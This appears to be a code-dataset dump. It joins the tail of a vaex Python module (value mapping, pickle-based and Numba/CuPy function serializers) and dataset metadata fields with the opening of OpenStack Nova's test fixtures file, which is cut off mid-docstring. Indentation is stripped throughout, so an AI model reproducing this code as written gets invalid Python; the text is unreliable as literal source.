raise ValueError('only axis=None is supported')
df = self.ds
mapper_keys = list(mapper.keys())
mapper_values = list(mapper.values())
try:
mapper_nan_key_mask = np.isnan(mapper_keys)
except TypeError:
# case where we have mixed strings/nan etc
def try_nan(x):
try:
return np.isnan(x)
except:
return False
mapper_nan_key_mask = np.array([try_nan(k) for k in mapper_keys])
mapper_has_nan = mapper_nan_key_mask.sum() > 0
if mapper_nan_key_mask.sum() > 1:
raise ValueError('Insanity, you provided multiple nan values as keys for your dict')
if mapper_has_nan:
for key, value in mapper.items():
if key != key:
nan_value = value
for key, value in mapper.items():
if key is None:
missing_value = value
if axis is not None:
raise ValueError('only axis=None is supported')
# we map the keys to a ordinal values [0, N-1] using the set
key_set = df._set(self.expression, flatten=axis is None)
found_keys = vaex.array_types.tolist(key_set.keys())
# we want all possible values to be converted
# so mapper's key should be a superset of the keys found
use_masked_array = False
if default_value is not None:
allow_missing = True
if allow_missing:
use_masked_array = True
if not set(mapper_keys).issuperset(found_keys):
missing = set(found_keys).difference(mapper_keys)
missing0 = list(missing)[0]
only_has_nan = missing0 != missing0 and len(missing) == 1
if allow_missing:
if default_value is not None:
value0 = list(mapper.values())[0]
assert np.issubdtype(type(default_value), np.array(value0).dtype), "default value has to be of similar type"
else:
if only_has_nan:
pass # we're good, the hash mapper deals with nan
else:
if missing != {None}:
raise ValueError('Missing %i values in mapper: %s' % (len(missing), missing))
# and these are the corresponding choices
# note that here we map 'planned' unknown values to the default values
# and later on in _choose, we map values not even seen in the dataframe
# to the default_value
dtype_item = self.data_type(self.expression, axis=-1)
mapper_keys = dtype_item.create_array(mapper_keys)
fingerprint = key_set.fingerprint + "-mapper"
hash_map_unique = vaex.hash.HashMapUnique.from_keys(mapper_keys, fingerprint=fingerprint, dtype=dtype_item)
indices = hash_map_unique.map(mapper_keys)
mapper_values = [mapper_values[i] for i in indices]
choices = [default_value] + [mapper_values[index] for index in indices]
choices = pa.array(choices)
key_hash_map_unique_name = df.add_variable('map_key_hash_map_unique', hash_map_unique, unique=True)
choices_name = df.add_variable('map_choices', choices, unique=True)
if allow_missing:
expr = '_map({}, {}, {}, use_missing={!r}, axis={!r})'.format(self, key_hash_map_unique_name, choices_name, use_masked_array, axis)
else:
expr = '_map({}, {}, {}, axis={!r})'.format(self, key_hash_map_unique_name, choices_name, axis)
return Expression(df, expr)
@property
def is_masked(self):
return self.ds.is_masked(self.expression)
def is_string(self):
return self.df.is_string(self.expression)
class FunctionSerializable(object):
pass
@vaex.serialize.register
class FunctionSerializablePickle(FunctionSerializable):
def __init__(self, f=None, multiprocessing=False):
self.f = f
self.multiprocessing = multiprocessing
def __eq__(self, rhs):
return self.f == rhs.f
def pickle(self, function):
return pickle.dumps(function)
def unpickle(self, data):
return pickle.loads(data)
def __getstate__(self):
return self.state_get()
def __setstate__(self, state):
self.state_set(state)
def state_get(self):
data = self.pickle(self.f)
if vaex.utils.PY2:
pickled = base64.encodestring(data)
else:
pickled = base64.encodebytes(data).decode('ascii')
return dict(pickled=pickled)
@classmethod
def state_from(cls, state, trusted=True):
obj = cls()
obj.state_set(state, trusted=trusted)
return obj
def state_set(self, state, trusted=True):
data = state['pickled']
if vaex.utils.PY2:
data = base64.decodestring(data)
else:
data = base64.decodebytes(data.encode('ascii'))
if trusted is False:
raise ValueError("Will not unpickle data when source is not trusted")
self.f = self.unpickle(data)
def __call__(self, *args, **kwargs):
'''Forward the call to the real function'''
import vaex.multiprocessing
return vaex.multiprocessing.apply(self._apply, args, kwargs, self.multiprocessing)
def _apply(self, *args, **kwargs):
return self.f(*args, **kwargs)
class FunctionSerializableJit(FunctionSerializable):
def __init__(self, expression, arguments, argument_dtypes, return_dtype, verbose=False, compile=True):
self.expression = expression
self.arguments = arguments
self.argument_dtypes = argument_dtypes
self.return_dtype = return_dtype
self.verbose = verbose
if compile:
self.f = self.compile()
else:
def placeholder(*args, **kwargs):
raise Exception('You chose not to compile this function (locally), but did invoke it')
self.f = placeholder
def state_get(self):
return dict(expression=self.expression,
arguments=self.arguments,
argument_dtypes=list(map(lambda dtype: str(dtype.numpy), self.argument_dtypes)),
return_dtype=str(self.return_dtype),
verbose=self.verbose)
@classmethod
def state_from(cls, state, trusted=True):
return cls(expression=state['expression'],
arguments=state['arguments'],
argument_dtypes=list(map(lambda s: DataType(np.dtype(s)), state['argument_dtypes'])),
return_dtype=DataType(np.dtype(state['return_dtype'])),
verbose=state['verbose'])
@classmethod
def build(cls, expression, df=None, verbose=False, compile=True):
df = df or expression.df
# if it's a virtual column, we probably want to optimize that
# TODO: fully extract the virtual columns, i.e. depending ones?
expression = str(expression)
if expression in df.virtual_columns:
expression = df.virtual_columns[expression]
# function validation, and finding variable names
all_vars = df.get_column_names(hidden=True) + list(df.variables.keys())
funcs = set(list(expression_namespace.keys()) + list(df.functions.keys()))
names = []
vaex.expresso.validate_expression(expression, all_vars, funcs, names)
# TODO: can we do the above using the Expressio API?s
arguments = list(set(names))
argument_dtypes = [df.data_type(argument, array_type='numpy') for argument in arguments]
return_dtype = df[expression].dtype
return cls(str(expression), arguments, argument_dtypes, return_dtype, verbose, compile=compile)
def __call__(self, *args, **kwargs):
'''Forward the call to the numba function'''
return self.f(*args, **kwargs)
@vaex.serialize.register
class FunctionSerializableNumba(FunctionSerializableJit):
def compile(self):
import numba
argstring = ", ".join(self.arguments)
code = '''
from numpy import *
def f({0}):
return {1}'''.format(argstring, self.expression)
if self.verbose:
print('Generated code:\n' + code)
scope = {}
exec(code, scope)
f = scope['f']
# numba part
def get_type(name):
if name == "bool":
name = "bool_"
return getattr(numba, name)
argument_dtypes_numba = [get_type(argument_dtype.numpy.name) for argument_dtype in self.argument_dtypes]
return_dtype_numba = get_type(self.return_dtype.numpy.name)
vectorizer = numba.vectorize([return_dtype_numba(*argument_dtypes_numba)])
return vectorizer(f)
@vaex.serialize.register
class FunctionSerializableCuda(FunctionSerializableJit):
def compile(self):
import cupy
# code generation
argstring = ", ".join(self.arguments)
code = '''
from cupy import *
import cupy
@fuse()
def f({0}):
return {1}
'''.format(argstring, self.expression)#, ";".join(conversions))
if self.verbose:
print("generated code")
print(code)
scope = dict()#cupy=cupy)
exec(code, scope)
func = scope['f']
def wrapper(*args):
args = [vaex.array_types.to_numpy(k) for k in args]
args = [vaex.utils.to_native_array(arg) if isinstance(arg, np.ndarray) else arg for arg in args]
args = [cupy.asarray(arg) if isinstance(arg, np.ndarray) else arg for arg in args]
return cupy.asnumpy(func(*args))
return wrapper
# TODO: this is not the right abstraction, since this won't allow a
# numba version for the function
@vaex.serialize.register
class FunctionToScalar(FunctionSerializablePickle):
def __call__(self, *args, **kwargs):
import vaex.multiprocessing
return vaex.multiprocessing.apply(self._apply, args, kwargs, self.multiprocessing)
def _apply(self, *args, **kwargs):
length = len(args[0])
result = []
def fix_type(v):
# TODO: only when column is str type?
if isinstance(v, np.str_):
return str(v)
if isinstance(v, np.bytes_):
return v.decode('utf8')
else:
return v
args = [vaex.array_types.tolist(k) for k in args]
for i in range(length):
scalar_result = self.f(*[fix_type(k[i]) for k in args], **{key: value[i] for key, value in kwargs.items()})
result.append(scalar_result)
result = np.array(result)
return result
class Function(object):
def __init__(self, dataset, name, f):
self.dataset = dataset
self.name = name
if not vaex.serialize.can_serialize(f): # if not serializable, assume we can use pickle
f = FunctionSerializablePickle(f)
self.f = f
def __call__(self, *args, **kwargs):
arg_string = ", ".join([str(k) for k in args] + ['{}={:r}'.format(name, value) for name, value in kwargs.items()])
expression = "{}({})".format(self.name, arg_string)
return Expression(self.dataset, expression)
class FunctionBuiltin(object):
def __init__(self, dataset, name, **kwargs):
self.dataset = dataset
self.name = name
self.kwargs = kwargs
def __call__(self, *args, **kwargs):
kwargs = dict(kwargs, **self.kwargs)
arg_string = ", ".join([str(k) for k in args] + ['{}={:r}'.format(name, value) for name, value in kwargs.items()])
expression = "{}({})".format(self.name, arg_string)
return Expression(self.dataset, expression)
|
[] |
[] |
[
"VAEX_DEBUG"
] |
[]
|
["VAEX_DEBUG"]
|
python
| 1 | 0 | |
nova/tests/fixtures/nova.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Nova tests."""
import collections
from contextlib import contextmanager
import logging as std_logging
import os
import warnings
import fixtures
import futurist
import mock
from openstack import service_description
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_messaging import conffixture as messaging_conffixture
from oslo_privsep import daemon as privsep_daemon
from oslo_utils.fixture import uuidsentinel
from requests import adapters
from sqlalchemy import exc as sqla_exc
from wsgi_intercept import interceptor
from nova.api.openstack import wsgi_app
from nova.api import wsgi
from nova.compute import multi_cell_list
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.db import migration
from nova.db.sqlalchemy import api as session
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.objects import service as service_obj
import nova.privsep
from nova import quota as nova_quota
from nova import rpc
from nova.scheduler import weights
from nova import service
from nova.tests.functional.api import client
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
DB_SCHEMA = collections.defaultdict(str)
SESSION_CONFIGURED = False
PROJECT_ID = '6f70656e737461636b20342065766572'
class ServiceFixture(fixtures.Fixture):
"""Run a service as a test fixture."""
def __init__(self, name, host=None, cell=None, **kwargs):
name = name
# If not otherwise specified, the host will default to the
# name of the service. Some things like aggregates care that
# this is stable.
host = host or name
kwargs.setdefault('host', host)
kwargs.setdefault('binary', 'nova-%s' % name)
self.cell = cell
self.kwargs = kwargs
def setUp(self):
super(ServiceFixture, self).setUp()
self.ctxt = context.get_admin_context()
if self.cell:
context.set_target_cell(self.ctxt, self.cell)
with mock.patch('nova.context.get_admin_context',
return_value=self.ctxt):
self.service = service.Service.create(**self.kwargs)
self.service.start()
self.addCleanup(self.service.kill)
class NullHandler(std_logging.Handler):
"""custom default NullHandler to attempt to format the record.
Used in conjunction with
log_fixture.get_logging_handle_error_fixture to detect formatting errors in
debug level logs without saving the logs.
"""
def handle(self, record):
self.format(record)
def emit(self, record):
pass
def createLock(self):
self.lock = None
class StandardLogging(fixtures.Fixture):
"""Setup Logging redirection for tests.
There are a number of things we want to handle with logging in tests:
* Redirect the logging to somewhere that we can test or dump it later.
* Ensure that as many DEBUG messages as possible are actually
executed, to ensure they are actually syntactically valid (they
often have not been).
* Ensure that we create useful output for tests that doesn't
overwhelm the testing system (which means we can't capture the
100 MB of debug logging on every run).
To do this we create a logger fixture at the root level, which
defaults to INFO and create a Null Logger at DEBUG which lets
us execute log messages at DEBUG but not keep the output.
To support local debugging OS_DEBUG=True can be set in the
environment, which will print out the full debug logging.
There are also a set of overrides for particularly verbose
modules to be even less than INFO.
"""
def setUp(self):
super(StandardLogging, self).setUp()
# set root logger to debug
root = std_logging.getLogger()
root.setLevel(std_logging.DEBUG)
# supports collecting debug level for local runs
if os.environ.get('OS_DEBUG') in ('True', 'true', '1', 'yes'):
level = std_logging.DEBUG
else:
level = std_logging.INFO
# Collect logs
fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
self.logger = self.useFixture(
fixtures.FakeLogger(format=fs, level=None))
# TODO(sdague): why can't we send level through the fake
# logger? Tests prove that it breaks, but it's worth getting
# to the bottom of.
root.handlers[0].setLevel(level)
if level > std_logging.DEBUG:
# Just attempt to format debug level logs, but don't save them
handler = NullHandler()
self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
handler.setLevel(std_logging.DEBUG)
# Don't log every single DB migration step
std_logging.getLogger(
'migrate.versioning.api').setLevel(std_logging.WARNING)
# Or alembic for model comparisons.
std_logging.getLogger('alembic').setLevel(std_logging.WARNING)
# At times we end up calling back into main() functions in
# testing. This has the possibility of calling logging.setup
# again, which completely unwinds the logging capture we've
# created here. Once we've setup the logging the way we want,
# disable the ability for the test to change this.
def fake_logging_setup(*args):
pass
self.useFixture(
fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
def delete_stored_logs(self):
# NOTE(gibi): this depends on the internals of the fixtures.FakeLogger.
# This could be enhanced once the PR
# https://github.com/testing-cabal/fixtures/pull/42 merges
self.logger._output.truncate(0)
class DatabasePoisonFixture(fixtures.Fixture):
def setUp(self):
super(DatabasePoisonFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_db.sqlalchemy.enginefacade._TransactionFactory.'
'_create_session',
self._poison_configure))
def _poison_configure(self, *a, **k):
# If you encounter this error, you might be tempted to just not
# inherit from NoDBTestCase. Bug #1568414 fixed a few hundred of these
# errors, and not once was that the correct solution. Instead,
# consider some of the following tips (when applicable):
#
# - mock at the object layer rather than the db layer, for example:
# nova.objects.instance.Instance.get
# vs.
# nova.db.instance_get
#
# - mock at the api layer rather than the object layer, for example:
# nova.api.openstack.common.get_instance
# vs.
# nova.objects.instance.Instance.get
#
# - mock code that requires the database but is otherwise tangential
# to the code you're testing (for example: EventReporterStub)
#
# - peruse some of the other database poison warning fixes here:
# https://review.opendev.org/#/q/topic:bug/1568414
raise Exception('This test uses methods that set internal oslo_db '
'state, but it does not claim to use the database. '
'This will conflict with the setup of tests that '
'do use the database and cause failures later.')
class SingleCellSimple(fixtures.Fixture):
"""Setup the simplest cells environment possible
This should be used when you do not care about multiple cells,
or having a "real" environment for tests that should not care.
This will give you a single cell, and map any and all accesses
to that cell (even things that would go to cell0).
If you need to distinguish between cell0 and cellN, then you
should use the CellDatabases fixture.
If instances should appear to still be in scheduling state, pass
instances_created=False to init.
"""
def __init__(
self, instances_created=True, project_id=PROJECT_ID,
):
self.instances_created = instances_created
self.project_id = project_id
def setUp(self):
super(SingleCellSimple, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMappingList._get_all_from_db',
self._fake_cell_list))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMappingList._get_by_project_id_from_db',
self._fake_cell_list))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMapping._get_by_uuid_from_db',
self._fake_cell_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.HostMapping._get_by_host_from_db',
self._fake_hostmapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._get_by_instance_uuid_from_db',
self._fake_instancemapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMappingList._get_by_instance_uuids_from_db',
self._fake_instancemapping_get_uuids))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._save_in_db',
self._fake_instancemapping_get_save))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._fake_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.set_target_cell',
self._fake_set_target_cell))
def _fake_hostmapping_get(self, *args):
return {'id': 1,
'updated_at': None,
'created_at': None,
'host': 'host1',
'cell_mapping': self._fake_cell_list()[0]}
def _fake_instancemapping_get_common(self, instance_uuid):
return {
'id': 1,
'updated_at': None,
'created_at': None,
'instance_uuid': instance_uuid,
'cell_id': (self.instances_created and 1 or None),
'project_id': self.project_id,
'cell_mapping': (
self.instances_created and self._fake_cell_get() or None),
}
def _fake_instancemapping_get_save(self, *args):
return self._fake_instancemapping_get_common(args[-2])
def _fake_instancemapping_get(self, *args):
return self._fake_instancemapping_get_common(args[-1])
def _fake_instancemapping_get_uuids(self, *args):
return [self._fake_instancemapping_get(uuid)
for uuid in args[-1]]
def _fake_cell_get(self, *args):
return self._fake_cell_list()[0]
def _fake_cell_list(self, *args):
return [{'id': 1,
'updated_at': None,
'created_at': None,
'uuid': uuidsentinel.cell1,
'name': 'onlycell',
'transport_url': 'fake://nowhere/',
'database_connection': 'sqlite:///',
'disabled': False}]
@contextmanager
def _fake_target_cell(self, context, target_cell):
# Just do something simple and set/unset the cell_uuid on the context.
if target_cell:
context.cell_uuid = getattr(target_cell, 'uuid',
uuidsentinel.cell1)
else:
context.cell_uuid = None
yield context
def _fake_set_target_cell(self, context, cell_mapping):
# Just do something simple and set/unset the cell_uuid on the context.
if cell_mapping:
context.cell_uuid = getattr(cell_mapping, 'uuid',
uuidsentinel.cell1)
else:
context.cell_uuid = None
class CheatingSerializer(rpc.RequestContextSerializer):
"""A messaging.RequestContextSerializer that helps with cells.
Our normal serializer does not pass in the context like db_connection
and mq_connection, for good reason. We don't really want/need to
force a remote RPC server to use our values for this. However,
during unit and functional tests, since we're all in the same
process, we want cell-targeted RPC calls to preserve these values.
Unless we had per-service config and database layer state for
the fake services we start, this is a reasonable cheat.
"""
def serialize_context(self, context):
"""Serialize context with the db_connection inside."""
values = super(CheatingSerializer, self).serialize_context(context)
values['db_connection'] = context.db_connection
values['mq_connection'] = context.mq_connection
return values
def deserialize_context(self, values):
"""Deserialize context and honor db_connection if present."""
ctxt = super(CheatingSerializer, self).deserialize_context(values)
ctxt.db_connection = values.pop('db_connection', None)
ctxt.mq_connection = values.pop('mq_connection', None)
return ctxt
class CellDatabases(fixtures.Fixture):
"""Create per-cell databases for testing.
How to use::
fix = CellDatabases()
fix.add_cell_database('connection1')
fix.add_cell_database('connection2', default=True)
self.useFixture(fix)
Passing default=True tells the fixture which database should
be given to code that doesn't target a specific cell.
"""
def __init__(self):
self._ctxt_mgrs = {}
self._last_ctxt_mgr = None
self._default_ctxt_mgr = None
# NOTE(danms): Use a ReaderWriterLock to synchronize our
# global database muckery here. If we change global db state
# to point to a cell, we need to take an exclusive lock to
# prevent any other calls to get_context_manager() until we
# reset to the default.
self._cell_lock = lockutils.ReaderWriterLock()
def _cache_schema(self, connection_str):
# NOTE(melwitt): See the regular Database fixture for why
# we do this.
global DB_SCHEMA
if not DB_SCHEMA[('main', None)]:
ctxt_mgr = self._ctxt_mgrs[connection_str]
engine = ctxt_mgr.writer.get_engine()
conn = engine.connect()
migration.db_sync(database='main')
DB_SCHEMA[('main', None)] = "".join(line for line
in conn.connection.iterdump())
engine.dispose()
@contextmanager
def _wrap_target_cell(self, context, cell_mapping):
# NOTE(danms): This method is responsible for switching global
# database state in a safe way such that code that doesn't
# know anything about cell targeting (i.e. compute node code)
# can continue to operate when called from something that has
# targeted a specific cell. In order to make this safe from a
# dining-philosopher-style deadlock, we need to be able to
# support multiple threads talking to the same cell at the
# same time and potentially recursion within the same thread
# from code that would otherwise be running on separate nodes
# in real life, but where we're actually recursing in the
# tests.
#
# The basic logic here is:
# 1. Grab a reader lock to see if the state is already pointing at
# the cell we want. If it is, we can yield and return without
# altering the global state further. The read lock ensures that
# global state won't change underneath us, and multiple threads
# can be working at the same time, as long as they are looking
# for the same cell.
# 2. If we do need to change the global state, grab a writer lock
# to make that change, which assumes that nothing else is looking
# at a cell right now. We do only non-schedulable things while
# holding that lock to avoid the deadlock mentioned above.
# 3. We then re-lock with a reader lock just as step #1 above and
# yield to do the actual work. We can do schedulable things
# here and not exclude other threads from making progress.
# If an exception is raised, we capture that and save it.
# 4. If we changed state in #2, we need to change it back. So we grab
# a writer lock again and do that.
# 5. Finally, if an exception was raised in #3 while state was
# changed, we raise it to the caller.
if cell_mapping:
desired = self._ctxt_mgrs[cell_mapping.database_connection]
else:
desired = self._default_ctxt_mgr
with self._cell_lock.read_lock():
if self._last_ctxt_mgr == desired:
with self._real_target_cell(context, cell_mapping) as c:
yield c
return
raised_exc = None
with self._cell_lock.write_lock():
if cell_mapping is not None:
# This assumes the next local DB access is the same cell that
# was targeted last time.
self._last_ctxt_mgr = desired
with self._cell_lock.read_lock():
if self._last_ctxt_mgr != desired:
# NOTE(danms): This is unlikely to happen, but it's possible
# another waiting writer changed the state between us letting
# it go and re-acquiring as a reader. If lockutils supported
# upgrading and downgrading locks, this wouldn't be a problem.
# Regardless, assert that it is still as we left it here
# so we don't hit the wrong cell. If this becomes a problem,
# we just need to retry the write section above until we land
# here with the cell we want.
raise RuntimeError('Global DB state changed underneath us')
try:
with self._real_target_cell(context, cell_mapping) as ccontext:
yield ccontext
except Exception as exc:
raised_exc = exc
with self._cell_lock.write_lock():
# Once we have returned from the context, we need
# to restore the default context manager for any
# subsequent calls
self._last_ctxt_mgr = self._default_ctxt_mgr
if raised_exc:
raise raised_exc
def _wrap_create_context_manager(self, connection=None):
ctxt_mgr = self._ctxt_mgrs[connection]
return ctxt_mgr
def _wrap_get_context_manager(self, context):
try:
# If already targeted, we can proceed without a lock
if context.db_connection:
return context.db_connection
except AttributeError:
# Unit tests with None, FakeContext, etc
pass
# NOTE(melwitt): This is a hack to try to deal with
# local accesses i.e. non target_cell accesses.
with self._cell_lock.read_lock():
# FIXME(mriedem): This is actually misleading and means we don't
# catch things like bug 1717000 where a context should be targeted
# to a cell but it's not, and the fixture here just returns the
# last targeted context that was used.
return self._last_ctxt_mgr
def _wrap_get_server(self, target, endpoints, serializer=None):
"""Mirror rpc.get_server() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.get_rpc_server(rpc.TRANSPORT,
target,
endpoints,
executor='eventlet',
serializer=serializer)
def _wrap_get_client(self, target, version_cap=None, serializer=None,
call_monitor_timeout=None):
"""Mirror rpc.get_client() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.RPCClient(rpc.TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer,
call_monitor_timeout=call_monitor_timeout)
def add_cell_database(self, connection_str, default=False):
"""Add a cell database to the fixture.
:param connection_str: An identifier used to represent the connection
string for this database. It should match the database_connection field
in the corresponding CellMapping.
"""
# NOTE(danms): Create a new context manager for the cell, which
# will house the sqlite:// connection for this cell's in-memory
# database. Store/index it by the connection string, which is
# how we identify cells in CellMapping.
ctxt_mgr = session.create_context_manager()
self._ctxt_mgrs[connection_str] = ctxt_mgr
# NOTE(melwitt): The first DB access through service start is
# local so this initializes _last_ctxt_mgr for that and needs
# to be a compute cell.
self._last_ctxt_mgr = ctxt_mgr
# NOTE(danms): Record which context manager should be the default
# so we can restore it when we return from target-cell contexts.
# If none has been provided yet, store the current one in case
# no default is ever specified.
if self._default_ctxt_mgr is None or default:
self._default_ctxt_mgr = ctxt_mgr
def get_context_manager(context):
return ctxt_mgr
# NOTE(danms): This is a temporary MonkeyPatch just to get
# a new database created with the schema we need and the
# context manager for it stashed.
with fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
get_context_manager):
engine = ctxt_mgr.writer.get_engine()
engine.dispose()
self._cache_schema(connection_str)
conn = engine.connect()
conn.connection.executescript(DB_SCHEMA[('main', None)])
def setUp(self):
super(CellDatabases, self).setUp()
self.addCleanup(self.cleanup)
self._real_target_cell = context.target_cell
# NOTE(danms): These context managers are in place for the
# duration of the test (unlike the temporary ones above) and
# provide the actual "runtime" switching of connections for us.
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.create_context_manager',
self._wrap_create_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
self._wrap_get_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._wrap_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_server',
self._wrap_get_server))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_client',
self._wrap_get_client))
def cleanup(self):
for ctxt_mgr in self._ctxt_mgrs.values():
engine = ctxt_mgr.writer.get_engine()
engine.dispose()
class Database(fixtures.Fixture):
def __init__(self, database='main', version=None, connection=None):
"""Create a database fixture.
:param database: The type of database, 'main', or 'api'
:param connection: The connection string to use
"""
super(Database, self).__init__()
# NOTE(pkholkin): oslo_db.enginefacade is configured in tests the same
# way as it is done for any other service that uses db
global SESSION_CONFIGURED
if not SESSION_CONFIGURED:
session.configure(CONF)
SESSION_CONFIGURED = True
self.database = database
self.version = version
if database == 'main':
if connection is not None:
ctxt_mgr = session.create_context_manager(
connection=connection)
self.get_engine = ctxt_mgr.writer.get_engine
else:
self.get_engine = session.get_engine
elif database == 'api':
self.get_engine = session.get_api_engine
def _cache_schema(self):
global DB_SCHEMA
if not DB_SCHEMA[(self.database, self.version)]:
engine = self.get_engine()
conn = engine.connect()
migration.db_sync(database=self.database, version=self.version)
DB_SCHEMA[(self.database, self.version)] = "".join(
line for line in conn.connection.iterdump())
engine.dispose()
def cleanup(self):
engine = self.get_engine()
engine.dispose()
def reset(self):
engine = self.get_engine()
engine.dispose()
self._cache_schema()
conn = engine.connect()
conn.connection.executescript(
DB_SCHEMA[(self.database, self.version)])
def setUp(self):
super(Database, self).setUp()
self.reset()
self.addCleanup(self.cleanup)
class DefaultFlavorsFixture(fixtures.Fixture):
def setUp(self):
super(DefaultFlavorsFixture, self).setUp()
ctxt = context.get_admin_context()
defaults = {'rxtx_factor': 1.0, 'disabled': False, 'is_public': True,
'ephemeral_gb': 0, 'swap': 0}
extra_specs = {
"hw:numa_nodes": "1"
}
default_flavors = [
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='1', name='m1.tiny',
**defaults),
objects.Flavor(context=ctxt, memory_mb=2048, vcpus=1,
root_gb=20, flavorid='2', name='m1.small',
**defaults),
objects.Flavor(context=ctxt, memory_mb=4096, vcpus=2,
root_gb=40, flavorid='3', name='m1.medium',
**defaults),
objects.Flavor(context=ctxt, memory_mb=8192, vcpus=4,
root_gb=80, flavorid='4', name='m1.large',
**defaults),
objects.Flavor(context=ctxt, memory_mb=16384, vcpus=8,
root_gb=160, flavorid='5', name='m1.xlarge',
**defaults),
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='6', name='m1.tiny.specs',
extra_specs=extra_specs, **defaults),
]
for flavor in default_flavors:
flavor.create()
class RPCFixture(fixtures.Fixture):
def __init__(self, *exmods):
super(RPCFixture, self).__init__()
self.exmods = []
self.exmods.extend(exmods)
self._buses = {}
def _fake_create_transport(self, url):
# FIXME(danms): Right now, collapse all connections
# to a single bus. This is how our tests expect things
# to work. When the tests are fixed, this fixture can
# support simulating multiple independent buses, and this
# hack should be removed.
url = None
# NOTE(danms): This will be called with a non-None url by
# cells-aware code that is requesting to contact something on
# one of the many transports we're multplexing here.
if url not in self._buses:
exmods = rpc.get_allowed_exmods()
self._buses[url] = messaging.get_rpc_transport(
CONF,
url=url,
allowed_remote_exmods=exmods)
return self._buses[url]
def setUp(self):
super(RPCFixture, self).setUp()
self.addCleanup(rpc.cleanup)
rpc.add_extra_exmods(*self.exmods)
self.addCleanup(rpc.clear_extra_exmods)
self.messaging_conf = messaging_conffixture.ConfFixture(CONF)
self.messaging_conf.transport_url = 'fake:/'
self.useFixture(self.messaging_conf)
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.create_transport', self._fake_create_transport))
# NOTE(danms): Execute the init with get_transport_url() as None,
# instead of the parsed TransportURL(None) so that we can cache
# it as it will be called later if the default is requested by
# one of our mq-switching methods.
with mock.patch('nova.rpc.get_transport_url') as mock_gtu:
mock_gtu.return_value = None
rpc.init(CONF)
def cleanup_in_flight_rpc_messages():
messaging._drivers.impl_fake.FakeExchangeManager._exchanges = {}
self.addCleanup(cleanup_in_flight_rpc_messages)
class WarningsFixture(fixtures.Fixture):
"""Filters out warnings during test runs."""
def setUp(self):
super(WarningsFixture, self).setUp()
# NOTE(sdague): Make deprecation warnings only happen once. Otherwise
# this gets kind of crazy given the way that upstream python libs use
# this.
warnings.simplefilter("once", DeprecationWarning)
# NOTE(sdague): this remains an unresolved item around the way
# forward on is_admin, the deprecation is definitely really premature.
warnings.filterwarnings('ignore',
message='Policy enforcement is depending on the value of is_admin.'
' This key is deprecated. Please update your policy '
'file to use the standard policy values.')
# NOTE(mriedem): Ignore scope check UserWarnings from oslo.policy.
warnings.filterwarnings('ignore',
message="Policy .* failed scope check",
category=UserWarning)
# NOTE(gibi): The UUIDFields emits a warning if the value is not a
# valid UUID. Let's escalate that to an exception in the test to
# prevent adding violations.
warnings.filterwarnings('error', message=".*invalid UUID.*")
# NOTE(mriedem): Avoid adding anything which tries to convert an
# object to a primitive which jsonutils.to_primitive() does not know
# how to handle (or isn't given a fallback callback).
warnings.filterwarnings(
'error',
message="Cannot convert <oslo_db.sqlalchemy.enginefacade"
"._Default object at ",
category=UserWarning)
warnings.filterwarnings(
'error', message='Evaluating non-mapped column expression',
category=sqla_exc.SAWarning)
# NOTE(stephenfin): Disable the annoying "TypeDecorator foo will not
# produce a cache key because the ``cache_ok`` flag is not set to True"
# warning. It's fixed in oslo.db 10.0.0 but not before.
# TODO(stephenfin): Remove once we bump oslo.db in lower-constraints to
# 10.0.0
warnings.filterwarnings(
'ignore',
message=r'TypeDecorator SoftDeleteInteger\(\) will not produce .*',
category=sqla_exc.SAWarning)
# TODO(stephenfin): Remove once we fix this is oslo.db 10.0.1 or so
warnings.filterwarnings(
'ignore',
message=r'Invoking and_\(\) without arguments is deprecated, .*',
category=sqla_exc.SADeprecationWarning)
# TODO(stephenfin): Remove once we fix this in placement 5.0.2 or 6.0.0
warnings.filterwarnings(
'ignore',
message='Implicit coercion of SELECT and textual SELECT .*',
category=sqla_exc.SADeprecationWarning)
# TODO(jangutter): Change (or remove) this to an error during the Train
# cycle when the os-vif port profile is no longer used.
warnings.filterwarnings(
'ignore', message=".* 'VIFPortProfileOVSRepresentor' .* "
"is deprecated", category=PendingDeprecationWarning)
self.addCleanup(warnings.resetwarnings)
class ConfPatcher(fixtures.Fixture):
"""Fixture to patch and restore global CONF.
